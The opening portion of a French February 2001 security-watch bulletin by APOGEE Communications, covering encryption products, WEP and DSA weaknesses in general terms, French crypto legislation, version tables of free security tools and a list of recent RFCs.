Veille Technologique Sécurité

Transcription

APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
1
31
N°°3
Février 2001
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S__EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce bulletin sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Février 2001
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
CONTRÔLE D'ACCÈS
5
BLACKWHOLE 2.1
5
CHIFFREMENT
6
CODEDDRAG 2.3
ADAPTATEUR LAN CHIFFRANT CHEZ INTEL
LES TECHNOLOGIES
6
6
7
SYSTÈMES RENFORCÉS
7
ACCORD ENTRE VMWARE ET LA NSA
7
GSM
7
SÉCURITÉ DE LA TROISÈME GÉNÉRATION
7
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
9
9
CHIFFREMENT
9
FAIBLESSES DANS LE PROTOCOLE WEP
DSA MIS À MAL
9
9
FORENSIC
10
SILENTRUNNER
LA LÉGISLATION
10
11
SOCIÉTÉ DE L'INFORMATION
11
LOI SOCIÉTÉ DE L'INFORMATION
11
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
12
12
12
NORMES ET STANDARDS
LES PUBLICATIONS DE L'IETF
14
14
LES
LES
RFC
DRAFTS
14
14
NOS COMMENTAIRES
19
LES RFC
19
RFC 3029
19
LES DRAFTS
DRAFT-MANNING-DSUA-06
19
DRAFT-LEWIS-STATE-OF-DNSSEC-00
DRAFT-GRIFFIN-SSH-HOST-KEYS-IN-DNS-00
ALERTES ET ATTAQUES
ALERTES
19
20
21
22
22
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
22
23
SYNTHÈSE MENSUELLE
ALERTES DÉTAILLÉES
23
24
AVIS OFFICIELS
24
EDITEUR
SOURCE
BORDERWARE
CERT
COMPAQ
CISCO
FREEBSD
HP
LINUX
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
LINUX SUSE
MICROSOFT
NETBSD
Veille Technologique Sécurité N°31
23
23
24
24
24
24
24
24
25
25
25
26
26
26
27
Page 2/42
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Février 2001
OPENSSH
OPENBSD
SCRIPT PHP
SSH1
SUN
TURBOLINUX
VIRUS
WATCHGUARD
WINGATE
27
27
27
27
27
28
28
28
28
ALERTES NON CONFIRMÉES
28
AOL
AT&T
BORDERWARE
FORE/MARCONI
GOAHEAD
IBM
LOTUS IBM
MICROSOFT
NOVELL
PGP4PINE
QNX
SUN
SUN STAROFFICE
SYMANTEC
28
28
28
29
29
29
29
29
29
29
29
30
30
30
AUTRES INFORMATIONS
30
REPRISES D'AVIS
30
ET
CORRECTIFS
CIAC
FREEBSD
HP
IBM
ISS
LINUX
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
NETBSD
ORACLE
TIS/NAI
VANDYKE
30
31
31
31
31
31
32
32
32
32
32
32
33
CODES D'EXPLOITATION
33
BULLETINS ET NOTES
33
BIND
CISCO
FREEBSD
SSH
33
33
33
33
AXENT/SYMANTEC
CERT
CIAC
EEYE
MANDRAKESOFT
LINUX REDHAT
33
33
33
34
34
34
ATTAQUES
34
OUTILS
34
HACKERWATCH.ORG
TRIANGLE BOY
SITE VULNERABILITIES.ORG
CRACKWHORE 2.2 34
34
35
36
TECHNIQUES
36
ATTAQUE INDIRECTE DU SITE NAI
IDENTIFICATION DES SERVICES
LA LISTE NON OFFICIELLE DES NUMÉROS DE PORT TC/UDP
36
39
40
Page 3/42
Février 2001
Le mot de la rédaction …
Coïncidence étonnante mais fortuite, la NSA et la CIA sont à 'la une' de ce
rapport de Veille Technologique:
le jour même de la diffusion d'une annonce commerciale concernant un
logiciel de sécurité par la société Raytheon, la NSA récompense deux de ses
employés pour la création de ce même logiciel,
cette même agence annonce un accord avec VMWare pour le
développement d'un système de sécurité quand on apprend qu'elle a par
ailleurs travaillé sur l'algorithme de signature DSA objet d'une attaque
académique,
l'histoire se répète avec la CIA dont on découvre qu'elle sponsorise le
développement d'un outil de navigation anonyme le jour de l'annonce de la
prochaine disponibilité de celui-ci par la société SafeWeb.
Soyons honnêtes, l'intérêt de ces deux agences pour les nouvelles technologies
de l'information et les 'jeunes pousses' n'est pas nouveau. Il fait même l'objet
de communiqués on ne peut plus officiels depuis l'année dernière …
L'équipe de Veille Technologique
Page 4/42
Février 2001
PR
RO
OD
DU
UIIT
TS
SE
ET
T TE
EC
CH
HN
NO
OL
LO
OG
GIIE
ES
S
LES
PRODUITS
CONTROLE D'ACCES
BLACKWHOLE 2.1
Description
'BlackWhole' de la société anglaise 'Carraig' est un logiciel destiné à sécuriser les environnements Windows™
95/98/ME et à renforcer les mécanismes de sécurité déjà présents sous Windows NT et 2000.
Ce produit assure deux fonctions complémentaires:
1. Un contrôle d'accès au système via une fenêtre de login paramétrable (logo de la société, zones de texte libre
pouvant contenir une bannière d'avertissement). Cette fenêtre vient en complément de la fenêtre originale,
toujours présentée mais automatiquement renseignée avec le mot de passe que l'utilisateur aura saisi lors de la
première connexion. Le mécanisme de sécurité initial reste ainsi actif.
2. Un chiffrement transparent des volumes et/ou fichiers spécifiés lors de la phase de configuration du produit.
L'algorithme 3DES est utilisé. Lors de la phase de chiffrement, les fichiers originaux sont effacés, les secteurs de
données étant remplis de valeurs aléatoires pour limiter tout risque de récupération par une analyse de bas
niveau.
Le point le plus remarquable réside dans le fait que le produit est totalement transparent pour l'utilisateur, voire
invisible si l'option d'utiliser un écran de login identique à celui du système d'exploitation a été sélectionnée.
Un code de 16 caractères dit 'PUC' (Product Unlock
Code) est généré - ou sélectionné - par l'utilisateur lors
de l'installation. Ce code est utilisé en dernier recours
pour déverrouiller l'accès au système. Il est à noter que
tous les systèmes partageant ce code pourront
partager en réseaux les fichiers chiffrés.
Une méthode de déploiement (MDS ou Mass
Deploiement System) est proposée qui permet de
générer un kit d'installation d'un volume inférieur au
méga-octet et protégé par chiffrement. Ce kit
contiendra la liste des utilisateurs habilités à utiliser les
systèmes sur lesquels il sera installé.
Un produit complémentaire dénommé
'Remote
Recovery Manager' peut être utilisé pour générer un
code de déverrouillage en cas de perte de la clef
d'accès (PUC).
La procédure mise en œuvre autorise le déverrouillage
du poste sans que l'administrateur ait à dévoiler le PUC
à l'utilisateur:
L'utilisateur donne le nom de son compte ainsi
qu'un challenge affiché sur le poste. Le nom de
compte permet de retrouver le PUC stocké dans la
base de donnée lors de l'installation.
Le challenge et le PUC sont ensuite combinés pour
former la clef de déverrouillage transmise à
l'utilisateur.
La société Carraig propose par ailleurs le produit 'Latches' destiné à pallier l'absence d'un mécanisme de contrôle
d'accès dans les environnements Windows™ 95 et 98. Notons que la durée de vie d'un tel produit est directement liée
à celle des systèmes cibles Windows™ 95 et 98.
Complément d’information
http://www.carraig.co.uk/
Page 5/42
Février 2001
CHIFFREMENT
CODEDDRAG 2.3
Description
La version 2.3 du produit de chiffrement de fichiers 'CodedDrag' est disponible. Ce produit, développé et vendu 30$
par l'université Johannes Kepler de Linz (Autriche), fonctionne en environnement Windows 9x, 2000 et NT 4.
Remarquablement conçu tant sur le plan des performances que de l'ergonomie d'utilisation, ce
produit utilise le mécanisme du 'Drag and Drop' pour activer le chiffrement. Une icône dédiée est
créée sur le Bureau lors de l'installation. Le chiffrement d'un quelconque fichier est effectué par
simple 'Déplacer/Relacher' du fichier (ou du répertoire) sur l'icône. Un double click sur le nom du
fichier chiffré active immédiatement son déchiffrement.
Les options de configuration sont paramétrables par le
biais d'une application activée depuis la barre de
contrôle.
L'utilisateur peut ainsi sélectionner:
- L'algorithme de chiffrement utilisé parmi les trois
algorithmes TripleDES, DES et BlowFish,
- L'utilisation d'une fonction de compression permettant
de réduire notablement la taille du fichier résultant,
- L'application d'une fonction de brouillage destinée à
masquer le nom original du fichier,
- La mémorisation des clefs utilisées - mémorisation de
la clef de chiffrement ou de chiffrement/déchiffrement
- ainsi que la durée de vie de cette mémorisation,
- La destruction du fichier de pagination lors de l'arrêt
du système.
On ne peut que regretter l'absence d'une fonction
permettant d'associer le processus de (dé)chiffrement à
une liste d'applications comme cela est proposé par le
produit 'SecurityBox' de la société Française MSI SA.
Une copie d'écran du contenu d'un répertoire avant et
après chiffrement est présentée ci-après. Le mécanisme
de compression est inefficace sur le fichier contenant
une image, celle-ci étant stockée dans un format déjà
compressé.
Non chiffre
Chiffré
Complément d'information
http://www.fim.uni-linz.ac.at/codeddrag/codedrag.htm
ADAPTATEUR LAN CHIFFRANT CHEZ INTEL
Description
La société INTEL propose plusieurs versions sécurisées de sa gamme de cartes réseaux Intel PRO.
Référencées 'Intel PRO/100S' Desktop Adapter' (format PCI), 'Intel PRO/100S' Server Adapter' (format PCI
disposant de fonctions de tolérance aux pannes) et 'Intel PRO/100SR' Mobile Adapter' (format PCMCIA intégrant
un modem V90), ces cartes utilisent un nouveau composant - l'Intel 8255x - et un co-processeur spécialisé - l'Intel
82594ED - assurant un chiffrement DES à haute performance.
Particulièrement adaptée à l'environnement Windows™ 2000, cette famille de cartes embarque une pile protocolaire
IPSEC jouant ainsi le rôle d'un accélérateur cryptographique. Les environnements Windows™ 98 et NT pourront
bénéficier de cette fonctionnalité sous réserve d'installer un gestionnaire de périphérique spécifique dénommé 'Intel
Packet Protect'.
La pile embarquée supporte les algorithmes et méthodes IPSEC suivantes:
Chiffrement:
DES/3DES
Authentification:
SHA-1/MD5
Page 6/42
Février 2001
Gestion de clef:
Preshared Key/EntrustPKI
Compatible avec les adaptateurs de la famille Intel PRO/100 classique, ces cartes peuvent être installées sans
modification dans un système existant, les fonctionnalités de sécurité étant alors désactivées. Ces cartes utilisant un
moyen cryptologique sont soumises aux règles applicables en la matière dans les pays fournisseurs (USA) et
utilisateurs (FR). En pratique, si l'utilisation de l'algorithme DES ne doit plus poser de problème, l'intégration du 3DES
(168bits) dans un processeur performant pourrait restreindre l'utilisation de ces produits. Le site INTEL France ne
fourni aucun détail, le site Américain annonce que l'exportation est susceptible d'être restreinte.
A noter également, l'apparition de cartes mères intégrant nativement cette gamme de cartes réseaux et le
processeur cryptographique associé !
http://www.intel.com/network/products/adapters_landing.htm
http://www.intel.fr/francais/network/solutions/security.htm
http://www.yoku.com.sg/d1192_mb.htm
LES
TECHNOLOGIES
SYSTEMES RENFORCES
ACCORD ENTRE VMWARE ET LA NSA
Description
La société Américaine 'VMWARE' est bien connue pour ses logiciels d'émulation permettant de faire fonctionner un
système d'exploitation - LINUX par exemple - en tant que tâche d'un autre système d'exploitation. Cette technologie
pourrait être mise à profit pour fournir un environnement fortement sécurisé si l'on se réfère à l'annonce d'un effort
de coopération entre un équipe de la NSA et VMWARE.
L'objectif serait de fournir un système susceptible de faire fonctionner n'importe quelle application du commerce dans
un environnement minimaliste assurant un fort niveau d'isolation entre le système et les autres applications. Ce
cloisonnement logiciel permet de limiter les risques de propagation en cas de contamination de l'un des
compartiments.
Cette technologie n'est pas sans rappeler celle utilisée dans certains systèmes d'exploitation existant ou ayant existé,
dont l'un des ancêtres d'UNIX, MULTICS, et le système HP Virtual Vault. La nouveauté, s'il doit y en avoir une,
réside dans la 'caution' apportée par l'officialisation d'un accord de coopération avec l'un des services les plus
controversé du monde.
http://www.vmware.com/news/releases/nsa_pr.html
GSM
SECURITE DE LA TROISEME GENERATION
Description
L'initiative 3GPP (ou Third Generation PartnerShip Project) qui regroupe les principaux acteurs dans le domaine de la
technologie GSM (Global System for Mobile) a pour objectif de gérer l'évolution concertée des spécifications du
système GSM dont les services étendus GPRS (General Packet Radio Service) et EDGE (Enhanced Data rates for GSM
Evolution).
Conscient de l'importance de la sécurité dans ces architectures, et plus largement de la réactivité de la communauté
mondiale face aux nouvelles technologies, le consortium 3GPP a depuis l'origine choisi de rendre publics les résultats
de ses travaux.
La série '33' traite ainsi l'ensemble de la problématique de la sécurité par le biais des 17 documents techniques
suivants:
33.102 Security Architecture (1999)
33.103 Security Integration Guidelines (1999)
33.105 Cryptographic Algorithm requirements (1999)
33.106 Lawful interception requirements (1999)
33.107 Lawful interception architecture and functions (1999)
33.120 Security Objectives and Principles (1999)
33.133 Security threats and requirements (1999)
33.20
Security principles for the UMTS
33.200 Network Domain Security
Page 7/42
Février 2001
33.21
UMTS Security Requirements
33.800 Principles for Network Domain Security
33.900 Guide to 3G security (Nov. 2000)
33.901 Criteria for cryptographic Algorithm design process (1999)
33.902 Formal Analysis of the 3G Authentication Protocol (1999)
33.903 Access Security for IP based services
33.904 Report on the Evaluation of 3GPP Standard Confidentiality and Integrity Algorithms
33.908 General report on the design, specification & evaluation of 3GPP std confidentiality & integrity algorithms
33.909 Report on the evaluation of 3GPP standard confidentiality and integrity algorithms
Le rapport technique 33.900 'Guide to 3G security' est particulièrement intéressant à lire car offrant une vision précise
et synthétique des différentes menaces, et des parades associées, prises en compte lors de la conception des
évolutions du système GSM dont principalement:
Le déni de service
Le vol d'identité
L'usurpation du réseau
L'écoute des données
L'usurpation d'identité
Une rapide lecture des rapports techniques traitant des interfaces d'interception - 33.106 et 33.107 - permettra de se
faire une bonne opinion des capacités d'interception du système. Les structures de données associés aux événements
générés sur les trois niveaux d'interfaces (X1, X2 et X3) y sont en effet largement détaillées.
Notons à ce sujet, qu'un draft ETSI (Réf. EG 201 781)concernant les interfaces d'interception dans le réseau
intelligent (IN) est disponible sur le site de ZDNET.
ftp://ftp.3gpp.org/Specs/Latest_drafts/33_series/33900-120.zip
http://www.3gpp.org/
http://www.zdnet.fr/actu/etsi.pdf
Page 8/42
Février 2001
IN
NF
FO
OR
RM
MA
AT
TIIO
ON
NS
SE
ET
T LE
EG
GIIS
SL
LA
AT
TIIO
ON
N
LES
INFORMATIONS
CHIFFREMENT
FAIBLESSES DANS LE PROTOCOLE WEP
Description
Des chercheurs de l'université de Berkeley ont publié un rapport de recherche concernant la qualité cryptographique
du protocole WEP (Wired Equivalent Privacy) intégré à la norme de transmission de donnée sans fil IEE802.11. Les
résultats de cette étude ne vont pas dans le sens attendu puisqu'ils mettent en évidence plusieurs faiblesses
autorisant aussi bien les attaques passives (sans intervention dans l'échange) que les attaques actives (un tiers
s'immisce dans l'échange).
Il apparaît ainsi qu'aucune des 3 propriétés fondamentales d'un protocole de sécurité - la confidentialité, le contrôle
d'accès, l'intégrité de données - n'est garantie par le protocole WEP.
La solidité de ce protocole à clef secrète ne repose que sur la seule difficulté à recouvrir la clef utilisée, la longueur de
celle-ci étant couramment limitée à 40bits. Tout défaut de conception ou d'implémentation permettant de réduire
l'espace de recherche de cette clef conduira inéluctablement à affaiblir le niveau de sécurité.
Concrètement, WEP utilise l'algorithme de chiffrement
RC4, algorithme de type 'stream cipher' générant une
suite d'octets chiffrants et nécessitant un vecteur V
d'initialisation (ou IV - Initialisation Value) de 24bits.
La clef K étant constante, la suite des valeurs
d'initialisation ne doit être ni prédictible ni trop fortement
récurrente.
Si tel n'est pas le cas, la clef peut être assez facilement
recouvrée, la valeur d'initialisation utilisée étant
nécessairement transmise en clair.
Figure extraite du rapport de recherche
Deux problèmes ont principalement été mis en évidence par les auteurs de l'étude:
1. La norme IEEE802.11 n'impose aucune contrainte sur la génération des valeurs d'initialisation et se contente de
recommander le changement de cette valeur pour chaque message transmis. Les auteurs ont ainsi découvert
qu'un coupleur PCMCIA - le fournisseur n'est pas cité - utilise comme valeur d'initialisation, le compteur du
nombre de message transmis, soit une périodicité de 2^24.
2. La taille de la valeur d'initialisation est insuffisante face à la capacité de trafic offerte en IEEE802.11. En
considérant un point d'accès travaillant à 5Mbs de débit utile et une longueur moyenne de 1500 octets, l'espace
des valeurs d'initialisation est parcouru en moins d'une demi-journée. La probabilité de trouver deux messages
chiffrés avec la même valeur d'initialisation et ayant une entête similaire est forte.
La mise en cause de la qualité de la spécification et de l'implémentation du protocole jette un sérieux doute sur la
sécurité de l'ensemble de la famille des protocoles dits 'Sans Fils'. Rappelons qu'une étude similaire portant sur la
sécurité du protocole BlueTooth, publiée par l'université d'Helsinki en Mai dernier, concluait, elle aussi, à l'existence
de faiblesses exploitables.
Sur un marché en pleine expansion, l'argument de la difficulté d'accès aux technologies permettant l'interception,
voire la manipulation, des données transmises ne tient pas. Les fréquences utilisées par la norme IEEE 802.11 2.4GHz - sont aussi allouées, et utilisées, par une kyrielle de dispositifs grand public libres d'accès. Il est ainsi
désormais possible de disposer d'un tuner 2.4Ghz programmable et d'une antenne patch ad'hoc pour moins de 90Є
(500FF). Le décodage numérique des trames peut être obtenu par réutilisation de la chaîne de décodage d'une carte
IEEE. Par ailleurs, et comme mentionné dans le rapport de recherche, certains coupleurs IEEE 802.11 offrent une
interface programmatique permettant d'accéder au niveau trame du protocole. Le reste n'est plus qu'une affaire de
programmation et de temps, du moins lorsque la solidité de la chaîne cryptographique est insuffisante.
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
http://www.niksula.cs.hut.fi/~jiitv/bluesec.html
DSA
MIS A MAL
Description
Un communiqué de presse publié par les Bell-Labs (centre de recherche de LUCENT) fait état d'une particularité
'inexpliquée' dans la conception du générateur d'aléa utilisé par l'algorithme DSA (Digital Standard Algorithm). Cet
Page 9/42
Février 2001
algorithme normalisé sous la référence ANSI X9.30 fait partie intégrante du mécanisme de signature DSS (Digital
Signature Scheme), objet du standard FIPS 186-2.
L'auteur de cette découverte, D.Bleichenbacher, est un cryptanalyste connu pour avoir mis en évidence en 1998 la
faiblesse du standard 'PKCS#1 RSA encryption standard' face à une attaque de type 'chiffré choisi'. Notons à ce
propos que cette technique avait été utilisée avec succès pour attaquer le protocole SSH V1.5 !
Dans le cas de l'algorithme DSA, la particularité réside dans une distribution '(a)normale' des valeurs pseudoaléatoires fournies par le générateur spécifié par le standard X9.30. Certaines plages de valeurs ont en effet deux
fois plus de chance d'être tirées que d'autres plages! Dès lors, le caractère 'aléatoire' n'étant plus respecté, la solidité
de l'algorithme, et par conséquence la qualité de la signature, ne peut plus être garantie. A ce jour, cette faille reste
inexploitable car nécessitant une énorme puissance de calcul.
Plusieurs palliatifs ont déjà été proposés et analysés lors de la dernière réunion du comité ANSI X9F1. Il est à noter
que l'algorithme ECDSA (Elliptic Curve Digital Standard Algorithm) spécifié par la norme ANSI X9.62 n'est pas
concerné par ce problème.
Http://www.bell-labs.com/press/0201/010205.bla.html
FORENSIC
SILENTRUNNER
Description
La société Américaine Raytheon a annoncé que son produit d'analyse et de corrélation 'SilentRunner' avait été
sélectionné par la firme True Security Corp. - précédemment connue sous l'appellation 'ICSA.net' - pour être
intégré à son offre de service.
Coïncidence fortuite, la NSA a publié à la même période un document officiel annonçant le versement d'une
récompense à deux de ses employés (le Curriculum Vitae de l'un d'entre eux est disponible sur Internet …) pour la
création du prototype de l'outil SilentRunner dont le développement et la commercialisation ont été assurés par
Raytheon.
Décrit comme étant un système passif d'analyse et de corrélation d'événement réseau - Discovery, Visualization and
Analysis (DVA) system - 'SilentRunner' est annoncé être utilisé par les services gouvernementaux Américains mais
aussi par les principales grandes firmes américaines des secteurs de la Défense, de la Finance, de l'Electronique et de
la Pharmacie.
Aucune version d'évaluation de ce système fonctionnant, semble-t-il, aussi bien en environnement NT qu'UNIX n'est
hélas proposée. Les quelques informations contenues dans les fiches techniques disponibles sur le site dédié
www.silentrunner.com et dans la brochure de présentation intitulée 'Information Rules. Protect Yours'
disponible sur le site de Raytheon laissent cependant présager des fonctionnalités d'analyse et de corrélation
impressionnante pour un prix annoncé de $65000:
Passive operation
Multiple remotes
Field portable
User-friendly interface
Network data acquisition
Real-time data views
Playback data views
Use of Boolean Expressions
Vulnerability assessments
Session reconstruction
Scenario reconstruction
Network traffic visualizations
Graphical network views
Network traffic analysis
2D and 3D visualizations
De part sa conception, cet outil semble parfaitement adapté à la surveillance et au contrôle de la bonne utilisation des
actifs gérés par le système d'information de l'Entreprise. 'SilentRunner' intègre notamment un mécanisme passif
d'auto-découverte de la topologie et des ressources du réseau ainsi qu'un système de détection d'anormalité.
La brochure de présentation intitulée 'Information Rules. Protect Yours' disponible sur le site de Raytheon
contient quelques copies d'écran qui permettent de se faire une idée du modèle d'analyse 3D.
http://www.silentrunner.com
http://www.raytheon.com/c3i/c3iproducts/c3i021/c3i021.htm
http://www.raytheonaircraftcharter.com/newsroom/briefs/silent_runner.html
http://www.nsa.gov/releases/first_royalties_nsa_employees_02122001.html
Page 10/42
Février 2001
LA
LEGISLATION
SOCIETE DE L'INFORMATION
LOI SOCIETE DE L'INFORMATION
Description
La revue 'Tranfert' a mis en ligne sur son site une copie de l'avant projet de la loi 'société de l'information' (ou
LSI) dont un des chapitres traite explicitement de la liberté d'utilisation de la cryptologie. Nous laisserons le lecteur
juger par lui même de la teneur du texte en attirant l'attention sur l'emploi d'un nouveau terme: le 'transfert'.
Si l'utilisation des moyens de cryptologie est annoncée libre (Art. 3.12-1), un contrôle est toujours exercé la
fourniture, l'import, l'export et le transfert de certaines catégories de moyens. Une liste établira les moyens dispensés
de toute formalité car n'interférant pas avec les 'intérêts de la défense nationale et de la sécurité intérieure ou
extérieure de l'Etat'.
Un dossier complet et fort intéressant car prenant en compte l'ensemble des thèmes abordés par la LSI est disponible
sur le site de l'association 'Imaginons un Réseau Internet Solidaire' (IRIS). Le lecteur y trouvera un historique
détaillé du projet de loi, le texte divulgué par 'Transfert' ainsi que la liste des textes de Loi susceptibles d'être modifiés
par la LSI.
Bien entendu, aucune garantie ne peut être apportée quant à l'exactitude et l'intégrité de la copie divulguée par
'Transfert', cette divulgation ayant pu être le résultat d'une action volontaire de test ou de désinformation.
http://www.transfert.net/fr/dossiers/article.cfm?idx_rub=87&idx_art=3968
http://www.iris.sgdg.org/actions/lsi/
Page 11/42
Février 2001
LO
OG
GIIC
CIIE
EL
LS
S LIIB
BR
RE
ES
S
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RÉSEAU
Nom
BIND
DHCP
NTP4
WU-FTP
Fonction
Ver.
Gestion de Nom (DNS)
Serveur d'adresse
Serveur de temps
Serveur de fichiers
9.1.1rc2
3.0b2pl16
4.0.99k
2.6.1
Date
Source
12/02/01
30/11/00
20/07/00
02/07/00
http://www.isc.org/products/BIND
http://www.isc.org/products/DHCP
http://www.eecis.udel.edu/~ntp
http://www.wu-ftpd.org
MESSAGERIE
Nom
Fonction
Ver.
Relevé courrier
Relevé courrier
Serveur de courrier
2000c
3.1
8.11.3
Nom
Fonction
Ver.
APACHE
Serveur WEB
IMAP4
POP3
SENDMAIL
Date
Source
20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html
07/04/00 http://www.eudora.com/qpopper_general/
27/02/01 http://www.sendmail.org
WEB
ModSSL
SQUID
1.3.17
2.0a9
API SSL Apache 1.3.17 2.8.0
Cache WEB
2.3s4
Date
Source
29/01/01 http://httpd.apache.org/dist
12/12/00
30/01/01 http://www.modssl.org/
18/07/00 http://www.squid-cache.org
AUTRE
Nom
INN
MAJORDOMO
OpenCA
OpenLDAP
LES
Fonction
Ver.
Gestion
Gestion
Gestion
Gestion
2.3.1
1.94.5
0.2.0-5
2.0.7
des news
des listes
de certificats
de l'annuaire
Date
Source
11/01/01
15/01/00
26/01/01
06/11/00
http://www.isc.org/products/INN
http://www.greatcircle.com/majordomo
http://www.openca.org
http://www.openldap.org
OUTILS
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les
tableaux suivants.
LANGAGES
Nom
Fonction
Ver.
Perl
PHP
Scripting
WEB Dynamique
5.6.0
4.0.4pl1
Date
Source
23/03/00 http://www.cpan.org/src/index.html
11/01/01 http://www.php.net
ANALYSE RÉSEAU
Nom
Big Brother
Dsniff
EtherEal
IP Traf
Nstreams
SamSpade
Fonction
Ver.
Visualisateur snmp
Boite à outils
Analyse multiprotocole
Statistiques IP
Générateur de règles
Boite à outils
1.6e1
2.3
0.8.15
2.3.1
1.0.0
1.14
Date
Source
29/01/01
17/12/00
11/01/01
13/11/00
11/11/00
10/12/99
http://maclawran.ca/bb-dnld/new-dnld.html
http://www.monkey.org/~dugsong/dsniff
http://www.ethereal.com
http://cebu.mozcom.com/riker/iptraf/
http://www.hsc.fr/ressources/outils/nstreams/download/
http://www.samspade.org/ssw/
ANALYSE DE JOURNAUX
Nom
Analog
Autobuse
WebAlizer
Fonction
Ver.
Journaux serveur http
Analyse syslog
Journaux serveur http
4.16
1.13
2.01-06
Date
Source
13/02/01 http://www.analog.cx
31/01/00 http://www.picante.com/~gtaylor/autobuse
17/10/00 http://www.mrunix.net/webalizer/
Page 12/42
Février 2001
ANALYSE DE SÉCURITÉ
Fonction
Ver.
Nessus
Nmap
Nom
Vulnérabilité réseau
Pandora
Saint
Sara
Tara (tiger)
Trinux
Vulnérabilité Netware
Vulnérabilité système
Boite à outils
1.0.7a
2.53
2.54B7
4.0b2.1
3.1.5
3.3.4
2.0.9
0.8pre1
Date
Source
30/01/00
05/09/00
17/09/00
12/02/99
13/02/01
26/01/01
07/09/99
22/10/00
http://www.nessus.org
http://www.insecure.org/nmap
http://www.packetfactory.net/projects/pandora/
http://www.wwdsi.com/saint
http://www-arc.com/sara
http://www-arc.com/tara
http://www.io.com/~mdfranz/trinux/boot-images/
CONFIDENTIALITÉ
Nom
Fonction
Ver.
OpenPGP
GPG
Signature/Chiffrement
Signature/Chiffrement
1.0.4p1
Date
Source
http://www.openpgp.org/
30/11/00 http://www.gnupg.org
CONTRÔLE D'ACCÈS
Nom
TCP Wrapper
Xinetd
Fonction
Ver.
Accès services TCP
Inetd amélioré
7.6
2.1.89p14
Date
Source
ftp://ftp.cert.org/pub/tools/tcp_wrappers
18/01/01 http://www.xinetd.org
CONTRÔLE D'INTÉGRITÉ
Nom
Fonction
Ver.
Tripwire
Intégrité LINUX
2.3.47
Date
Source
15/08/00 http://www.tripwire.org/downloads/index.php
DÉTECTION D'INTRUSION
Nom
Fonction
Deception TK Pot de miel
Snort
IDS Système
Shadow
IDS Réseau
Ver.
19990818
1.7
1.6
Date
Source
18/08/99 http://all.net/dtk/dtk.html
05/01/01 http://www.snort.org
01/07/00 http://www.nswc.navy.mil/ISSEC/CID/
GÉNÉRATEURS DE TEST
Nom
Fonction
Ver.
Analyse filtres
Fragments IP
Paquets IP
Détection d'intrusion
Sessions TCP
Paquets UDP
1.0
1.6
2.1a
1.0
1.0.1
1.2
Nom
Fonction
Ver.
DrawBridge
IpFilter
Sinus
PareFeu FreeBsd
Filtre datagramme
PareFeu Linux
3.1
3.4.16
0.1.6
FireWalk
FragRouter
IPSend
IDSWakeUp
TcpReplay
UdpProbe
Date
Source
03/02/01
21/09/97
19/09/97
13/10/00
19/05/97
13/02/96
http://www.packetfactory.net/firewalk
http://www.anzen.com/research/nidsbench/
ftp://coombs.anu.edu.au/pub/net/misc
http://www.hsc.fr/ressources/outils/idswakeup/download/
http://www.anzen.com/research/nidsbench/
http://sites.inka.de/sites/bigred/sw/udpprobe.txt
PARE-FEUX
Date
Source
19/04/00 http://drawbridge.tamu.edu
15/01/01 http://coombs.anu.edu.au/ipfilter/ip-filter.html
01/09/00 http://www.ifi.unizh.ch/ikm/SINUS/firewall
TUNNELS
Fonction
Ver.
CIPE
FreeSwan
http-tunnel
Nom
Pile Crypto IP (CIPE)
Pile IPSec
Encapsulation http
OpenSSL
OpenSSH
SSF
Stunnel
Zebedee
Pile SSL
Pile SSH 1 et 2
Pile SSH 1 autorisée
Proxy https
Tunnel TCP/UDP
1.5.1
1.8
3.0.5
3.2 (dev)
0.9.6
2.5.1
1.2.27.6
3.13
2.2.1
Date
Source
11/02/01
04/12/00
06/12/00
31/08/00
24/09/00
19/02/01
16/09/99
25/01/01
09/02/01
http://sites.inka.de/sites/bigred/devel/cipe.html
http://www.freeswan.org
http://www.nocrew.org/software/httptunnel.html
http://www.openssl.org/
http://www.openssh.com/
http://info.in2p3.fr/secur/ssf
http://www.stunnel.org
http://www.winton.org.uk/zebedee/
Page 13/42
Février 2001
NO
OR
RM
ME
ES
SE
ET
T ST
TA
AN
ND
DA
AR
RD
DS
S
LES
LES
PUBLICATIONS DE L'IETF
RFC
Du 27/01/2001 au 23/02/2001, 13 RFC ont été publiés dont 3 RFC ayant trait à la
sécurité.
RFC TRAITANT DE LA SÉCURITÉ
Thème
CMD
LDAP
PKI
Num Date Etat Titre
3058
3062
3029
02/01 Inf
02/01 Pst
02/01 Exp
Use of the IDEA Encryption Algorithm in CMS
LDAP Password Modify Extended Operation
Internet X.509 Public Key Infrastructure Data Validation and Certification Server Protocols
RFC TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ
